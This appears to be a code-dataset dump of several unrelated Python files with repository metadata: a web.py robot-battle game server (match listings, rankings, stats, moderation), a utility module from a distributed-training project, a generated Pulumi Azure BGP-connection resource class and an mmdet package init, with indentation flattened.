not disabled and r.rating > robots.rating + 1e-5) as ranking
from robots
join users on users.id = robots.user_id
where robots.id = $id'''
robot = db.query(query, vars={'id': rid})
return robot[0] if robot else None
def GET(self, rid, against=None):
robot = self.get_robot(int(rid))
if not robot:
return lmsg('Robot not found.')
query = '''
select
matches.*,
r1.name as r1_name,
r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where (r1.id = $id or r2.id = $id)
and (state = {0} or state = {1})
order by matches.id desc
'''.format(ms.WAITING, ms.RUNNING)
next_matches = db.query(query, vars={'id': rid})
latest_match = get_latest_match()
query = '''
select
matches.*,
r1.name as r1_name,
r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where (r1_id = $id or r2_id = $id)
and (state = {0} or state = {1})
order by timestamp desc
LIMIT {2}
'''.format(ms.ERROR, ms.DONE, 5)
matches = db.query(
query, vars={'id': rid})
challenges = 0
if logged_in(sess):
result = db.select('users',
what='challenges',
where='id=$id',
vars={'id': sess.user_id})
if result:
challenges = CHALLENGES_LIMITS - result[0]['challenges']
return ltpl('viewrobot', robot, matches, next_matches,
latest_match.id if latest_match else None, challenges)
class PageRobotHistory:
def get_robot(self, rid):
query = '''
select
robots.id, user_id, name, disabled, last_updated, deleted,
rating, users.about, open_source, priority, time,
length(compiled_code) as len, fast, short, winrate, automatch,
(select count(*) from robots r where compiled and passed and
not disabled and r.rating > robots.rating + 1e-5) as ranking
from robots
join users on users.id = robots.user_id
where robots.id = $id'''
robot = db.query(query, vars={'id': rid})
return robot[0] if robot else None
def GET(self, rid, against=None):
robot = self.get_robot(int(rid))
if not robot:
return lmsg('Robot not found.')
opponent = None
if against is not None:
opponent = self.get_robot(int(against))
if not opponent:
return lmsg('Robot against not found.')
#robot.about = self.convert_links(robot.about)
params = web.input(page=None, ranked=None, per=None)
page = int(params.page or 0)
ranked = int(params.ranked or 0)
per = int(params.per or MATCHES_PER_PAGE)
if per > 200 and not tplib.is_admin(sess):
per = 200
ranked = 'and ranked' if ranked > 0 else 'and not ranked' if ranked < 0 else ''
if against is None:
query = '''
select
matches.*,
r1.name as r1_name,
r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where (r1_id = $id or r2_id = $id)
and (state = {0} or state = {1})
{3}
order by timestamp desc
limit {2}
offset $page'''.format(ms.ERROR, ms.DONE, per,
ranked)
matches = db.query(
query, vars={'id': rid, 'page': page * per})
else:
query = '''
select
matches.*,
r1.name as r1_name,
r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where ((r1_id = $id1 and r2_id = $id2) or
(r1_id = $id2 and r2_id = $id1))
and (state = {0} or state = {1})
{3}
order by timestamp desc
limit {2}
offset $page'''.format(ms.ERROR, ms.DONE, per,
ranked)
matches = db.query(
query,
vars={
'id1': rid,
'id2': against,
'page': page * per
})
return ltpl('robot_history', robot, matches, page, per, against,
params.ranked)
class PageViewUser:
def get_user_detailed(self, uid):
query = '''
select
*, coalesce(r.count, 0) as robot_count
from users
left join (
select
user_id as uid, count(*) as count
from robots
where not robots.disabled
group by user_id
) as r
on r.uid = users.id
where users.id = $id'''
user = db.query(query, vars={'id': uid})
return user[0] if user else None
def get_robots(self, uid, disabled=False):
query = '''
select
*,
(select count(*) from robots r where compiled and passed and
not disabled and r.rating > robots.rating + 1e-5) as ranking
from robots
where robots.user_id = $id and disabled = $disabled and not deleted
order by robots.rating desc nulls last
'''
robots = db.query(query, vars={'id': uid, 'disabled': disabled})
return robots if robots else []
def get_user(self, uid):
query = '''
select id, about, last_active, registered_on
from users
where id = $id'''
user = db.query(query, vars={'id': uid})
return user[0] if user else None
def GET(self, uid=None):
if uid is None or ('user_id' in sess and int(uid) == sess.user_id):
uid = force_login(sess)
user = self.get_user_detailed(int(uid))
user.robots_limit = ROBOTS_LIMITS + user.extra_bots
user.challenges_limit = CHALLENGES_LIMITS
else:
user = self.get_user(int(uid))
if not user:
return lmsg('User not found.')
robots = self.get_robots(int(uid))
disabled_robots = self.get_robots(int(uid), True)
return ltpl('viewuser', user, robots, disabled_robots)
def get_match(mid):
query = '''
select
matches.*,
r1.compiled_code as r1_code, r2.compiled_code as r2_code,
r1.name as r1_name, r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where matches.id = $id'''
match = db.query(query, vars={'id': mid})
return match[0] if match else None
def get_pending_matches():
query = '''
select
matches.*,
r1.compiled_code as r1_code, r2.compiled_code as r2_code,
r1.name as r1_name, r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where state = {0} and not ranked'''.format(ms.WAITING)
return db.query(query)
class PageChallengeRobot:
def match_running(self, rid, challenger):
result = db.select('matches',
what='id',
where='''
(r1_id = $id1 and r2_id = $id2 or
r1_id = $id2 and r2_id = $id1)
and (state = {0} or state = {1})
'''.format(ms.WAITING, ms.RUNNING),
vars={'id1': rid, 'id2': challenger})
return result[0].id if result else None
def eligible(self, rid):
result = db.select(
'robots', what='count(*)',
where='passed and compiled and not deleted and id=$id',
vars={'id': rid})
return result and result[0]['count'] > 0
def is_self(self, rid):
result = db.select('robots', what='user_id', where='id=$id', vars={'id': rid})
return (result and result[0]['user_id'] == sess.user_id)
def get_rating(self, rid):
result = db.select('robots', what='rating', where='id=$id', vars={'id': rid})
return result[0]['rating']
def limit_ok(self, user_id, num_matches):
result = db.select('users',
what='challenges',
where='id=$id',
vars={'id': user_id})
if result:
result = result[0]
return result['challenges'] + num_matches <= CHALLENGES_LIMITS
return False
def GET(self, rid, challenger=None, num_matches=None):
force_login(sess)
rid = int(rid)
if self.is_self(rid):
return lmsg('You can\'t challenge one of your own robots.')
if num_matches is None:
num_matches = 1
else:
num_matches = int(num_matches)
if not self.limit_ok(sess.user_id, num_matches):
return lmsg('''
You <a href="/profile"><b>don't have enough challenges</b></a>
left today! The counts are reset every day at midnight EST.
<br/><br/>''')
if challenger is None:
robots = db.select(
'robots',
where='user_id=$id and compiled and passed and not deleted',
vars={'id':sess.user_id})
return ltpl('choosechallenge', rid, robots)
challenger = int(challenger)
if not self.is_self(challenger):
return lmsg('You can only challenge others with your robots.')
if not self.eligible(rid):
return lmsg('The enemy is not eligible to fight.')
if not self.eligible(challenger):
return lmsg('Your robot is not eligible to fight.')
# create match
for l in range(num_matches):
if random.random() < 0.5:
match_id = db.insert(
'matches', r1_id=rid, r2_id=challenger,
ranked=False, r1_rating=self.get_rating(rid),
r2_rating=self.get_rating(challenger),
seed=random.randint(1, settings.max_seed))
else:
match_id = db.insert(
'matches', r2_id=rid, r1_id=challenger,
ranked=False, r2_rating=self.get_rating(rid),
r1_rating=self.get_rating(challenger),
seed=random.randint(1, settings.max_seed))
# add to user's challenges count
db.query('UPDATE users SET challenges=challenges+$c WHERE id=$id',
vars={'id': sess.user_id, 'c': num_matches})
if num_matches == 1:
raise web.seeother('/match/{0}'.format(match_id))
else:
raise web.seeother('/robot/{0}'.format(rid))
class PageMatchList:
def GET(self):
recent = get_last_matches(100)
query = '''
select
matches.*,
r1.name as r1_name,
r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where (state = {0} or state = {1})
order by matches.id desc
'''.format(ms.WAITING, ms.RUNNING)
next_matches = db.query(query)
return ltpl('matchlist', recent, next_matches)
class PageMatch:
def GET(self, mid):
match = get_match(int(mid))
if not match:
return 'match not found'
match.data = get_match_data(match['id'])
has_match_log = time.time() - match.timestamp < tools.WEEK
return ltpl('match', match, has_match_log)
class PageStatic:
def GET(self, page):
return ltpl(page)
PER_PAGE = 20
class PageDirectory:
def get_ranking(self, rating, where=''):
if rating is None:
count = db.select('robots',
what='count(*)',
where='''compiled and passed and not disabled
and rating is not NULL {0}'''.format(where))
else:
count = db.select('robots',
what='count(*)',
where='''compiled and passed and not disabled
and rating > $rating + 1e-5 {0}'''.format(where),
vars={'rating': rating})
return count[0]['count'] if count else None
def GET(self):
params = web.input(upper=None, page=None, latest=None, os=None,
diff=None, pri=None, viewactive=None, fast=None,
time=None, short=None, disabled=None, tlimit=None,
win=None, per=None)
params.diff = int(params.diff or 0)
if params.latest:
order = 'last_updated desc'
elif params.diff > 0:
order = 'rating-last_rating desc nulls last'
elif params.diff < 0:
order = 'rating-last_rating asc nulls first'
elif params.pri:
order = 'priority desc'
elif params.time:
order = 'time desc'
elif params.win:
order = 'winrate ' + ('desc' if int(params.win) > 0 else 'asc')
else:
order = 'rating desc nulls last'
per = int(params.per or PER_PAGE)
if per > 200 and not tplib.is_admin(sess):
per = 200
os_where = ' and not disabled' if not params.disabled else ''
os_where += ' and open_source' if params.os else ''
os_where += ' and automatch' if params.viewactive else ''
t = 2 if not params.tlimit else float(params.tlimit)
os_where += ' and time < {0}'.format(t) if params.fast else ''
os_where += ' and length(compiled_code) < 1000' if params.short else ''
page = int(params.page or 0)
os_what = '''id, user_id, name, rating, open_source, automatch,
last_updated, last_rating, fast, short, winrate'''
if params.upper == '':
upper = None
robots = list(db.select('robots',
what=os_what,
where='''compiled and rating is NULL and passed
and not deleted {0}'''.format(os_where),
order=order,
limit=per,
offset=page*per,
vars=locals()))
else:
if params.upper is None and 'logged_in' in sess and sess.user_id:
my_robots = list(db.select('robots',
what='rating',
where='''compiled and rating is not NULL and passed
and not deleted and user_id=$user_id
{0}'''.format(os_where),
order=order,
vars={'user_id': sess.user_id}))
if not my_robots:
top_rating = settings.default_rating
else:
top_rating = my_robots[0].rating
my_rank = self.get_ranking(top_rating, os_where)
goal_rank = max(0, my_rank - (per - 1) / 2)
#print top_rating, my_rank, goal_rank
left, right = int(top_rating), 10000
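# Binary search over rating values for an upper bound whose ranking is
# approximately goal_rank, so that the listing starts about half a page
# above the logged-in user's best robot rather than at the very top.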
while left < right:
#print left, right
mid = (left + right + 1) / 2
cur_rank = self.get_ranking(mid, os_where)
if cur_rank > goal_rank:
left = mid
elif cur_rank < goal_rank:
right = mid - 1
else:
left = mid
break
upper = left
else:
upper = float(params.upper or 1000000)
robots = list(db.select('robots',
what=os_what,
where='''compiled and passed and not deleted
and (rating <= $upper or rating is NULL) {0}'''.format(os_where),
order=order,
limit=per,
offset=page*per,
vars=locals()))
start_ranking = 0
if robots:
start_ranking = self.get_ranking(robots[0].rating, os_where)
return ltpl('directory', robots, upper, start_ranking, page, per,
params.latest, params.os, params.diff, params.viewactive,
params.fast, params.short)
class PageStats:
def count_users_registered(self):
count = db.select('users',
what='count(*)',
where='registered_on > $time',
vars={'time': time.time() - tools.MONTH})
return count[0]['count'] if count else 0
def count_users_period(self, period):
count = db.select('users',
what='count(*)',
where='last_active > $time',
vars={'time': time.time() - period})
return count[0]['count'] if count else 0
def count_users_month(self):
return self.count_users_period(tools.MONTH)
def count_users_week(self):
return self.count_users_period(tools.WEEK)
def count_users_with_passing_robots(self):
users = db.select('robots',
what='1',
where='compiled and passed and not disabled and automatch',
group='user_id')
return len(users) if users else None
def count_users_with_robots(self):
users = db.select('robots',
what='1',
where='compiled and not disabled and automatch',
group='user_id')
return len(users) if users else None
def count_robots_not_disabled(self):
count = db.select('robots',
what='count(*)',
where='not disabled and automatch')
return count[0]['count'] if count else 0
def count_robots_compiled(self):
count = db.select('robots',
what='count(*)',
where='compiled and not disabled and automatch')
return count[0]['count'] if count else 0
def count_robots_passing(self):
count = db.select('robots',
what='count(*)',
where='compiled and passed and not disabled and automatch')
return count[0]['count'] if count else 0
def count_robots_available(self):
count = db.select('robots',
what='count(*)',
where='compiled and passed and not disabled')
return count[0]['count'] if count else 0
def count_robots_updated(self):
count = db.select('robots',
what='count(*)',
where='''compiled and passed and not disabled
and last_updated > $time''',
vars={'time': time.time() - tools.MONTH})
return count[0]['count'] if count else 0
def count_matches(self):
match_count = db.select('matches', what='count(*)',
where='state={0}'.format(ms.DONE))
return match_count[0]['count'] if match_count else None
def count_histories(self):
match_count = db.select('history', what='count(*)')
return match_count[0]['count'] if match_count else None
def average_rating(self):
result = db.select('robots', what='AVG(rating)',
where='passed and compiled and not disabled')[0]['avg']
return int(result) if result is not None else 0
def count_matchmaker_processes(self):
pipes = subprocess.Popen(['ps', 'uxaf'], stdout=subprocess.PIPE)
processes = pipes.stdout.readlines()
scripts = ('matchmaker',)
counts = dict((x, dict(root=0, nobody=0)) for x in scripts)
for process in processes:
for script in scripts:
if ('python {0}.py'.format(script)) not in process:
continue
for user in ('root', 'nobody'):
if user in process:
counts[script][user] += 1
break
return counts
def GET(self):
info = [
'count_users_registered',
'count_users_month',
'count_users_with_robots',
'count_users_with_passing_robots',
'count_robots_available',
'count_robots_not_disabled',
'count_robots_compiled',
'count_robots_passing',
'count_robots_updated',
'count_matches',
'count_histories',
'average_rating']
return ltpl('stats', *[getattr(self, x)() for x in info])
class PageRobotStats:
def GET(self):
robots = db.select(
'robots',
what='id, user_id, rating, name, automatch, disabled',
where='compiled and passed')
bots = []
for robot in robots:
bots.append({
'id': robot.id,
'user_id': robot.user_id,
'rating': robot.rating,
'name': robot.name,
'automatch': robot.automatch,
'disabled': robot.disabled,
})
return json.dumps(bots)
DEFAULT_PERIOD = tools.MONTH
class PageRobotCharts:
def get_robot(self, rid):
query = '''
select
robots.id, user_id, name, disabled, last_updated, deleted,
rating, users.about, open_source, priority, time,
length(compiled_code) as len, fast, short, winrate, automatch,
(select count(*) from robots r where compiled and passed and
not disabled and r.rating > robots.rating + 1e-5) as ranking
from robots
join users on users.id = robots.user_id
where robots.id = $id'''
robot = db.query(query, vars={'id': rid})
return robot[0] if robot else None
def get_chart_data(self, robot, full=None):
if full:
oldest = 0
else:
oldest = int(time.time() - DEFAULT_PERIOD)
chart_data = None
query1 = '''
select
timestamp, r1_rating as rating, r1_ranking as ranking
from matches
where r1_id = $id and ranked and state = 3 and timestamp > $t'''
query2 = '''
select
timestamp, r2_rating as rating, r2_ranking as ranking
from matches
where r2_id = $id and ranked and state = 3 and timestamp > $t'''
rating_data = []
ranking_data = []
max_rating = 0
max_timestamp = 0
for query in [query1, query2]:
for pair in db.query(query, vars={'id': robot.id, 't': oldest}):
rating_data.append(
(pair.timestamp * 1000, pair.rating))
if pair.rating > max_rating:
max_rating, max_timestamp = pair.rating, pair.timestamp
if pair.ranking is not None:
ranking_data.append(
(pair.timestamp * 1000, pair.ranking + 1))
rating_data.sort(key=lambda x: x[0])
ranking_data.sort(key=lambda x: x[0])
query = '''
select floor(rating/100) as r, count(*) as n from robots
where passed and compiled and not disabled and rating is not null
group by r order by r desc
'''
group_data = []
for group in db.query(query):
group_data.append((group.r * 100, group.n))
chart_data = [
{
'data': rating_data,
'label': 'ELO Rating',
'color': 'black',
},
]
chart_data.append(
{
'data': ranking_data,
'label': 'Overall Rank',
'color': 'darkcyan',
'yaxis': 2,
},
)
chart_data = '''
var data = {0};
var last_updated = {1};
var cur_rating = {3};
var gdata = {2};
var max_rating = {4};
var max_timestamp = {5};
'''.format(json.dumps(chart_data),
robot.last_updated * 1000,
json.dumps(group_data),
robot.rating or settings.default_rating,
max_rating,
max_timestamp * 1000)
chart_data = chart_data.encode('base64')
return chart_data
def GET(self, rid, against=None):
robot = self.get_robot(int(rid))
if not robot:
return lmsg('Robot not found.')
params = web.input(full=None)
chart_data = self.get_chart_data(robot, params.full)
return ltpl('robotcharts', robot, chart_data, params.full)
class PageStaticBlank:
def GET(self, page):
return tpl(page)
class PageProfile:
_form = web.form.Form(
web.form.Textarea('about'))
def get_user(self, uid):
query = '''
select id, about
from users
where id = $id'''
user = db.query(query, vars={'id': uid})
return user[0] if user else None
def GET(self):
force_login(sess)
user = self.get_user(sess.user_id)
if not user:
return lmsg('Your account was not found.')
return ltpl('profile', user)
def POST(self):
force_login(sess)
form = self._form()
if not form.validates():
return lmsg('Invalid input.')
if len(form.d.about) > 5000:
return lmsg('Please limit your profile to fewer than 5,000 characters.')
db.update('users', where='id=$id', about=form.d.about, vars={'id': sess.user_id})
raise web.seeother('/user/{0}'.format(sess.user_id))
class PageRobotTest:
def GET(self, rid):
rid = int(rid)
robot = get_robot(rid, check_user_id=False)
if not robot or not tplib.is_admin(sess):
return lmsg('That robot was not found.')
query = '''
select
*
from robots
where open_source and compiled and passed and
rating > $rating - 100
order by robots.rating desc
'''
# only robots with greater rating can be possibly copied
os_robots = db.query(query, vars={'rating': robot.rating})
shortest = None
minlen = None
for os_robot in os_robots:
os_code = os_robot.code.splitlines(True)
code = robot.code.splitlines(True)
if len(os_code) > 1.5 * len(code) or len(code) > 1.5 * len(os_code):
continue
ud = difflib.ndiff(os_code, code)
ud = [line for line in ud if line[:2] != '? ']
if shortest is None or len(ud) - len(os_code) < minlen:
minlen = len(ud) - len(os_code)
shortest = ud
if shortest is not None:
return tpl(
'robotsource',
pygments.highlight(
''.join(shortest),
pygments.lexers.text.DiffLexer(),
pygments.formatters.HtmlFormatter()),
robot.name)
else:
return lmsg('No similarities found.')
class PageRobotSource:
def GET(self, rid):
rid = int(rid)
robot = get_robot(rid, check_user_id=False)
if not robot:
return lmsg('That robot was not found.')
if robot.open_source or (logged_in(sess) and sess.user_id == robot.user_id) or tplib.is_admin(sess):
web.header('Content-Type', 'text/html')
return tpl(
'robotsource',
pygments.highlight(
robot.compiled_code,
pygments.lexers.PythonLexer(),
pygments.formatters.HtmlFormatter()),
robot.name,
robot.open_source)
raise web.seeother('/robot/{0}'.format(rid))
def get_robot_with_ranking(rid):
where = 'id=$id'
vars = {'id': rid}
if not (logged_in(sess) and sess.user_id == 1):
where += ' and user_id=$user_id'
vars['user_id'] = sess.user_id
query = '''
select *,
(select count(*) from robots r where compiled and passed and
not disabled and r.rating > robots.rating + 1e-5) as ranking
from robots
where {0}'''.format(where)
result = db.query(query, vars=vars)
return result[0] if result else None
class PageDisableRobot:
def GET(self, rid):
force_login(sess)
rid = int(rid)
robot = get_robot(rid)
if not robot:
return lmsg('That robot was not found.')
if tplib.is_admin(sess):
db.update('robots',
where='id=$id',
vars={'id': rid},
disabled=True)
raise web.seeother('/robot/{0}'.format(rid))
else:
db.update('robots',
where='id=$id and user_id=$user_id',
vars={'id': rid, 'user_id': sess.user_id},
disabled=True)
raise web.seeother('/robots')
class PageEnableRobot:
def GET(self, rid):
force_login(sess)
rid = int(rid)
robot = get_robot(rid)
if not robot:
return lmsg('That robot was not found.')
if tplib.is_admin(sess):
db.update('robots',
where='id=$id',
vars={'id': rid},
disabled=False)
raise web.seeother('/robot/{0}'.format(rid))
else:
robot_count = count_robots(sess.user_id)
user = db.select('users', what='extra_bots', where='id=$id',
vars={'id': sess.user_id})
robot_limit = ROBOTS_LIMITS
if user:
robot_limit += user[0]['extra_bots']
if robot_count >= robot_limit:
return lmsg(BOT_LIMIT_REACHED_MSG.format(robot_limit))
db.update('robots',
where='id=$id and user_id=$user_id',
vars={'id': rid, 'user_id': sess.user_id},
disabled=False)
return web.seeother('/robots')
class PageDeleteRobot:
def GET(self, rid):
force_login(sess)
rid = int(rid)
robot = get_robot(rid)
if not robot:
return lmsg('That robot was not found.')
return ltpl('delrobot', robot)
def POST(self, rid):
force_login(sess)
rid = int(rid)
if tplib.is_admin(sess):
db.update('robots',
where='id=$id',
vars={'id': rid},
disabled=True,
deleted=True)
raise web.seeother('/robot/{0}'.format(rid))
else:
db.update('robots',
where='id=$id and user_id=$user_id',
vars={'id': rid, 'user_id': sess.user_id},
disabled=True,
deleted=True)
raise web.seeother('/robots')
class PageModerate:
def GET(self, rid=None):
if not tplib.is_mod(sess): raise web.seeother('/')
if rid is not None:
rid = int(rid)
query = """
insert into fail_bots (hash, code) select md5($code), $code where
not exists (select 1 from fail_bots where hash = md5($code))
"""
robots = db.select('robots', what='compiled_code', where='id=$id',
vars={'id': rid})
if robots:
code = robots[0]['compiled_code']
db.query(query, vars={'code': code})
db.update('robots', where='id=$id', vars={'id': rid},
passed=False, disabled=True)
raise web.ok
robots = db.select('robots', what='id, rating, compiled_code',
where='''passed and compiled and not disabled and
rating is not NULL and rating < 300 and
not automatch and last_updated
< extract(epoch from now()) - 60 * 60 * 24 * 7''',
order='rating asc')
maximum = int(web.input(maximum=100000).maximum)
return ltpl('moderate', robots, maximum)
class PageUpdatePrefs(object):
def GET(self):
params = web.input(show_actions=None, show_grid=None)
if params.show_actions is not None:
sess.show_actions = True if params.show_actions=='yes' else False
if params.show_grid is not None:
sess.show_grid = True if params.show_grid=='yes' else False
return web.ok
MAX_RETRIES = 10
application = app.wsgifunc()
if __name__ == '__main__':
app.run()
| 33.928475
| 108
| 0.538384
|
5f3d0992e153e04bf904f0104f25958ef43073aa
| 1,547
|
py
|
Python
|
src/worker/utils.py
|
hwang595/Draco
|
8472912cce82e6d74087a402fd417e7a837517ab
|
[
"MIT"
] | 21
|
2018-09-19T06:30:57.000Z
|
2022-03-25T22:44:39.000Z
|
src/worker/utils.py
|
hwang595/Draco
|
8472912cce82e6d74087a402fd417e7a837517ab
|
[
"MIT"
] | 3
|
2018-12-31T05:44:22.000Z
|
2021-09-09T15:59:46.000Z
|
src/worker/utils.py
|
hwang595/Draco
|
8472912cce82e6d74087a402fd417e7a837517ab
|
[
"MIT"
] | 12
|
2018-09-19T06:30:59.000Z
|
2021-12-13T09:53:54.000Z
|
from __future__ import print_function
from mpi4py import MPI
import numpy as np
import sys
sys.path.append("..")
from nn_ops import NN_Trainer
from compress_gradient import compress
from datasets.utils import get_batch
from util import *
import torch
from torch.autograd import Variable
import time
from datetime import datetime
import copy
from sys import getsizeof
STEP_START_ = 1
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
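# Illustrative usage (shapes assumed for the example, not taken from any caller):
# given logits of shape (batch, classes) and integer targets of shape (batch,),
#     top1, top5 = accuracy(output, target, topk=(1, 5))
# returns the top-1 and top-5 precision as percentages.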
class ModelBuffer(object):
def __init__(self, network):
"""
This class stores the model weights received from the parameter server.
The current step of each layer is also tracked here, to make sure the
model is always up-to-date.
"""
self.recv_buf = []
self.layer_cur_step = []
# note: we don't want to update the parameters of `BatchNorm` layers right now,
# so we temporarily deprecate the foregoing version and only update the model
# parameters
for param_idx, param in enumerate(network.parameters()):
self.recv_buf.append(np.zeros(param.size()))
self.layer_cur_step.append(0)
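# Sketch of the intended usage (illustrative only; the actual receive loop lives
# in the worker code, and `comm`/`cur_step` below are placeholders):
#     buf = ModelBuffer(network)
#     for idx, _ in enumerate(network.parameters()):
#         comm.Recv([buf.recv_buf[idx], MPI.DOUBLE], source=0)
#         buf.layer_cur_step[idx] = cur_step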
| 30.333333
| 84
| 0.681319
|
db132ebb9b1c1e907b1cd264c4199e336c7c4d95
| 6,502
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/network/v20200501/virtual_hub_bgp_connection.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/network/v20200501/virtual_hub_bgp_connection.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/network/v20200501/virtual_hub_bgp_connection.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = ['VirtualHubBgpConnection']
class VirtualHubBgpConnection(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
connection_name: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
peer_asn: Optional[pulumi.Input[int]] = None,
peer_ip: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
virtual_hub_name: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Virtual hub BGP connection resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] connection_name: The name of the connection.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] name: Name of the connection.
:param pulumi.Input[int] peer_asn: Peer ASN.
:param pulumi.Input[str] peer_ip: Peer IP.
:param pulumi.Input[str] resource_group_name: The resource group name of the VirtualHub.
:param pulumi.Input[str] virtual_hub_name: The name of the VirtualHub.
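Example (illustrative only -- the resource names and peer values below are
placeholders, not taken from any real deployment):
import pulumi_azure_nextgen.network.v20200501 as network
bgp_connection = network.VirtualHubBgpConnection("bgpConnection",
    connection_name="conn1",
    resource_group_name="rg1",
    virtual_hub_name="hub1",
    peer_asn=65514,
    peer_ip="10.5.0.3")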
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if connection_name is None:
raise TypeError("Missing required property 'connection_name'")
__props__['connection_name'] = connection_name
__props__['id'] = id
__props__['name'] = name
__props__['peer_asn'] = peer_asn
__props__['peer_ip'] = peer_ip
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if virtual_hub_name is None:
raise TypeError("Missing required property 'virtual_hub_name'")
__props__['virtual_hub_name'] = virtual_hub_name
__props__['connection_state'] = None
__props__['etag'] = None
__props__['provisioning_state'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/latest:VirtualHubBgpConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200601:VirtualHubBgpConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200701:VirtualHubBgpConnection")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(VirtualHubBgpConnection, __self__).__init__(
'azure-nextgen:network/v20200501:VirtualHubBgpConnection',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'VirtualHubBgpConnection':
"""
Get an existing VirtualHubBgpConnection resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return VirtualHubBgpConnection(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="connectionState")
def connection_state(self) -> pulumi.Output[str]:
"""
The current state of the VirtualHub to Peer.
"""
return pulumi.get(self, "connection_state")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def name(self) -> pulumi.Output[Optional[str]]:
"""
Name of the connection.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="peerAsn")
def peer_asn(self) -> pulumi.Output[Optional[int]]:
"""
Peer ASN.
"""
return pulumi.get(self, "peer_asn")
@property
@pulumi.getter(name="peerIp")
def peer_ip(self) -> pulumi.Output[Optional[str]]:
"""
Peer IP.
"""
return pulumi.get(self, "peer_ip")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Connection type.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 39.889571
| 287
| 0.63319
|
277cc02c2f80eb0206763fcc047ac15c5858bb7f
| 259
|
py
|
Python
|
mmdet/core/utils/__init__.py
|
yizhe-ang/MMSceneGraph
|
d4daec3d7930d6fe1efe75b9c0a265c8be0b70ba
|
[
"MIT"
] | 24
|
2021-10-14T03:28:28.000Z
|
2022-03-29T09:30:04.000Z
|
mmdet/core/utils/__init__.py
|
yizhe-ang/MMSceneGraph
|
d4daec3d7930d6fe1efe75b9c0a265c8be0b70ba
|
[
"MIT"
] | 4
|
2021-12-14T15:04:49.000Z
|
2022-02-19T09:54:42.000Z
|
mmdet/core/utils/__init__.py
|
yizhe-ang/MMSceneGraph
|
d4daec3d7930d6fe1efe75b9c0a265c8be0b70ba
|
[
"MIT"
] | 4
|
2021-10-31T11:23:06.000Z
|
2021-12-17T06:38:50.000Z
|
from .dist_utils import DistOptimizerHook, allreduce_grads
from .misc import multi_apply, tensor2imgs, unmap, enumerate_by_image
__all__ = [
